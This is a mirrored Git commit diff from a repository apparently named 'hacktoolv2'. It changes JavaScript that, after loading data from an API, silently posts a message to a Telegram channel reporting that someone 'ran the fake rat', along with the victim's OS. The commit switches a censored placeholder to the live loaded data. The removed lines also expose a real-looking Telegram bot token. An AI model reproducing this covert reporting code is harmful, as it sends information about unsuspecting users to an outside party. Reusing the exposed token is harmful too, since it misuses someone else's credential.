mirror of
https://github.com/constantinDev/hacktoolv2
synced 2025-08-29 15:47:39 +00:00
Updated tool
This commit is contained in:
parent
56aef62b95
commit
a5dcc5c613
Binary file not shown.
@ -53,11 +53,11 @@ axios({
|
||||
}).then(d => {
|
||||
logger.log("Successfully loaded the API. Loading modules...")
|
||||
axios({
|
||||
url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
|
||||
url: "https://api.telegram.org/bot(censored)/sendMessage",
|
||||
method: "POST",
|
||||
data: {
|
||||
chat_id: "@lmaotxt",
|
||||
text: `<strong>${/*d.data*/"(censored because testing)"}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
|
||||
text: `<strong>${d.data}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
|
||||
parse_mode: "HTML"
|
||||
}
|
||||
}).then(async () => {
|
||||
|
Loading…
x
Reference in New Issue
Block a user